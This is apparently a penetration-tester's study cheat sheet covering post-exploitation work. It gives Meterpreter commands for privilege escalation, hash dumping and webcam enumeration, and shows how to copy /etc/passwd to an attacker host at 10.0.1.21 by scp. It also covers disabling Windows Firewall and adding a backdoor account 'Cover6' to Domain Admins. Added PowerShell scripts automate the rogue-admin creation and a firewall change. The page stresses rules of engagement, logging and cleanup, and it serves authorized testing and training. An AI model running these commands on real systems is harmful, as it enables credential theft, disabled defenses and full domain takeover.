#PentesterPrep
Meterpreter
Meterpreter is an advanced, extensible payload that ships with the Metasploit Framework. It is most often delivered as a reverse payload (windows/meterpreter/reverse_tcp or reverse_https, for example) that connects from the target back to a handler on the attacking machine, which gets through firewalls that only filter inbound traffic; bind variants that listen on the target also exist. The payload is loaded reflectively into memory and by default writes nothing to disk, and it runs inside the process that was exploited (or the process that loaded it) rather than starting a new one; it can later be moved into another process with the migrate command. Once the stage is delivered, traffic between the session and the handler is encrypted: current versions of Meterpreter encrypt their own packets, and the reverse_https transport additionally wraps them in TLS. On top of that channel the attacker gets a command shell, the ability to run executables, file upload and download, and host and network enumeration, with further functionality loaded on demand as extensions and post modules.
Assuming you have a Meterpreter session on a Windows host, the following commands are a reasonable first pass. The ones that start with run invoke post modules, or, for winenum and get_local_subnet, legacy Meterpreter scripts that still work but have largely been superseded by post/ modules.
Try to escalate the session to NT AUTHORITY\SYSTEM (the priv extension tries several local techniques; it needs local administrator rights in the current session):
meterpreter > getsystem
Show the account the session is running as, which also confirms whether getsystem worked:
meterpreter > getuid
Broad local enumeration (legacy script): users, groups, services, network configuration, installed software and more, logged on the attacking machine:
meterpreter > run winenum
OS version, architecture, hostname and domain membership:
meterpreter > sysinfo
Network interfaces and addresses, the quickest way to spot a second network worth pivoting into:
meterpreter > ipconfig
Enumerate the local subnets the host can reach (legacy script):
meterpreter > run get_local_subnet
List window stations and desktops, which tells you whether an interactive user is present before trying screenshots or keylogging:
meterpreter > enumdesktops
List attached webcams:
meterpreter > webcam_list
Dump local account password hashes, or domain hashes if the host is a domain controller; this needs SYSTEM, so run getsystem first:
meterpreter > run post/windows/gather/smart_hashdump
Installed applications, currently logged-on users, shares, and whether the host is a virtual machine:
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/enum_shares
meterpreter > run post/windows/gather/checkvm
Return to the msfconsole prompt without killing the session (sessions -i <id> resumes it):
meterpreter > background
After exploiting a Linux host with a plain command-shell payload there is usually no prompt, so the screen may look blank; the shell is still there and takes your standard Linux post-exploitation commands. On many current distributions ifconfig and netstat are not installed, in which case use ip addr and ss -antp instead.
# ifconfig
# whoami
# netstat -antp
Copying a file back to the attacking machine needs a transfer tool, not shell redirection: the form cat /etc/passwd >> root@10.0.1.21:/root only tries to append to a local file of that name. Assuming an SSH server is listening on the attacking machine at 10.0.1.21, use scp:
# scp /etc/passwd root@10.0.1.21:/root/
Firewalls
Windows Firewall can be inspected and reconfigured from an elevated command prompt with netsh. List every rule (the output is long; netsh advfirewall show currentprofile gives just the summary of the active profile):
C:> netsh advfirewall show rule name=all
Disable the firewall on all three profiles (domain, private, public). This is a very noisy change: it is recorded in the Security event log, it changes the host's exposure to everything else on the network, and it needs explicit permission under the rules of engagement. Where you only need one port reachable, add a single rule for that port instead.
C:> netsh advfirewall set allprofile state off
Re-enable it as soon as you are done:
C:> netsh advfirewall set allprofile state on
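The narrower alternative to switching every profile off, written as an added PowerShell example rather than a command from the original page: record the profile state, add one inbound rule for the one port you need, verify it, remove it afterwards, and confirm nothing else changed. It assumes an elevated PowerShell session on Windows 8 / Server 2012 or later (the NetSecurity module that provides the *-NetFirewall* cmdlets); the rule name and port 4444 are placeholder values.

```powershell
# Added example, not from the original page. Assumes an elevated PowerShell
# session on Windows 8 / Server 2012+ (NetSecurity module available).
$RuleName = 'Pentest-Temp-Inbound'   # assumption: a name you will recognise in the report
$Port     = 4444                     # assumption: the listener port you actually need

# Record the state of each profile so it can be compared (and reported) afterwards.
$before = Get-NetFirewallProfile | Select-Object Name, Enabled, DefaultInboundAction
$before | Format-Table -AutoSize

# Equivalent of "netsh advfirewall show rule name=all", reduced to what matters when
# deciding what is reachable: enabled rules that allow inbound TCP, and their ports.
Get-NetFirewallRule -Enabled True -Direction Inbound -Action Allow |
    Get-NetFirewallPortFilter |
    Where-Object { $_.Protocol -eq 'TCP' } |
    Select-Object -ExpandProperty LocalPort -Unique |
    Sort-Object

# The narrow change: one rule, one port, one protocol, all profiles.
New-NetFirewallRule -DisplayName $RuleName -Direction Inbound -Protocol TCP `
    -LocalPort $Port -Action Allow -Profile Any | Out-Null

# Verify the rule exists and is enabled before relying on it.
$rule = Get-NetFirewallRule -DisplayName $RuleName -ErrorAction Stop
if ($rule.Enabled -ne 'True') { throw "Rule $RuleName was created but is not enabled" }

# ... do the work that needed the port ...

# Clean up only what you added. The cmdlet equivalent of
# "netsh advfirewall set allprofile state off" is
#   Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled False
# and if the engagement rules ever allow it, it must be undone with -Enabled True.
Remove-NetFirewallRule -DisplayName $RuleName

# Confirm the profiles are exactly as they were; no output means no difference.
$after = Get-NetFirewallProfile | Select-Object Name, Enabled, DefaultInboundAction
Compare-Object $before $after -Property Name, Enabled, DefaultInboundAction
```

The before/after comparison is the part worth keeping in your notes: it is the evidence that the host was left as you found it.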
Domain Enumeration
The following commands, with the proper privileges, allow for Windows domain enumeration. net user and net users are the same command. Without /domain they query the local SAM of the host you are on; with /domain they query the domain controller (the PDC emulator) of the domain the host is joined to, so the host must be domain-joined and able to reach a DC. Any domain account can run these read-only queries; administrative rights are only needed for the account changes that follow.
C:> net user
C:> net user /domain
C:> net group /domain
C:> net group "Domain Admins" /domain
Adding a user to the Domain
Upon successfully enumerating the system/network and acquiring domain administrator privileges, the user Cover6 with the password Cover6#C6S can be added to the domain. The password has to satisfy the domain password policy (net accounts /domain shows it) or the command fails with a policy error. From a Windows command prompt running as a domain administrator:
C:> net user Cover6 Cover6#C6S /ADD /DOMAIN
Adding a user to the Domain Admins group
Once Cover6 exists in the domain, add it to the Domain Admins group and then confirm the membership with net group "Domain Admins" /domain rather than assuming it worked. Both changes are recorded on the domain controller as Security events 4720 (user account created) and 4728 (member added to a security-enabled global group), so expect a monitored environment to notice, and remove the account at the end of the engagement with net group "Domain Admins" Cover6 /DELETE /DOMAIN followed by net user Cover6 /DELETE /DOMAIN. The command to add the group membership from a Windows prompt is:
C:> net group "Domain Admins" Cover6 /ADD /DOMAIN
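The enumeration, account creation and group-membership steps above as one checked procedure, written here as an added PowerShell example (not code from the original page). It drives net.exe rather than the ActiveDirectory module so it works on any domain-joined Windows host, checks the exit code of every call, parses the column-formatted output of net group to verify the result, and refuses to proceed if the account already exists. It assumes an elevated session running as a domain administrator on a domain-joined host; the user name and password are the page's values, and Invoke-Net and Get-NetGroupMembers are helper functions defined here, not built-ins.

```powershell
# Added example, not from the original page. Assumes an elevated PowerShell session
# running as a domain administrator on a domain-joined host that can reach a DC.
$User     = 'Cover6'
$Password = 'Cover6#C6S'   # quoted: an unquoted '#' can start a PowerShell comment
$Group    = 'Domain Admins'

function Invoke-Net {
    # Helper (defined here): run net.exe with the given arguments, fail loudly on a
    # non-zero exit code, and return the captured output lines.
    param([string[]]$Arguments)
    $out = & net.exe @Arguments 2>&1
    if ($LASTEXITCODE -ne 0) {
        throw "net.exe $($Arguments -join ' ') failed (exit $LASTEXITCODE):`n$($out -join "`n")"
    }
    $out
}

function Get-NetGroupMembers {
    # Helper (defined here): parse the member list printed by "net group <name> /domain":
    # everything between the dashed separator and the trailing status line, split on
    # whitespace. Account names containing spaces would be split, so treat the result
    # as a quick membership check, not an authoritative export.
    param([string]$GroupName)
    $lines = @(Invoke-Net @('group', $GroupName, '/domain'))
    $start = -1
    for ($i = 0; $i -lt $lines.Count; $i++) {
        if ($lines[$i] -match '^-{10,}') { $start = $i; break }
    }
    if ($start -lt 0 -or $start + 1 -ge $lines.Count) {
        throw "Unexpected output from net group $GroupName /domain"
    }
    $lines[($start + 1)..($lines.Count - 1)] |
        Where-Object { $_ -and $_ -notmatch 'completed successfully' } |
        ForEach-Object { $_ -split '\s+' } |
        Where-Object { $_ }
}

# 1. Enumerate: current members of the group, and whether the account already exists.
$before = Get-NetGroupMembers $Group
"Current $Group members: $($before -join ', ')"
if (Invoke-Net @('user', '/domain') | Select-String -Pattern "\b$User\b" -Quiet) {
    throw "Account $User already exists in the domain; choose another name"
}

# 2. Create the account (net user <name> <password> /ADD /DOMAIN). Fails if the
#    password does not meet the domain policy; Invoke-Net surfaces that error.
Invoke-Net @('user', $User, $Password, '/ADD', '/DOMAIN') | Out-Null

# 3. Add it to the group (net group "Domain Admins" <name> /ADD /DOMAIN).
Invoke-Net @('group', $Group, $User, '/ADD', '/DOMAIN') | Out-Null

# 4. Verify rather than assume, querying the same way the change was made.
$after = Get-NetGroupMembers $Group
if ($after -notcontains $User) { throw "$User was not added to $Group" }
"$User is now a member of $Group"

# 5. Cleanup to run at the end of the engagement (logged on the DC as Security
#    events 4729 and 4726, just as the additions were logged as 4720 and 4728):
#    net group "Domain Admins" Cover6 /DELETE /DOMAIN
#    net user Cover6 /DELETE /DOMAIN
```

Checking $LASTEXITCODE after each net.exe call is the point of the wrapper: net.exe prints its errors to stderr and PowerShell does not stop on them by default, so without the check a failed user creation would be followed by a group addition that silently fails too.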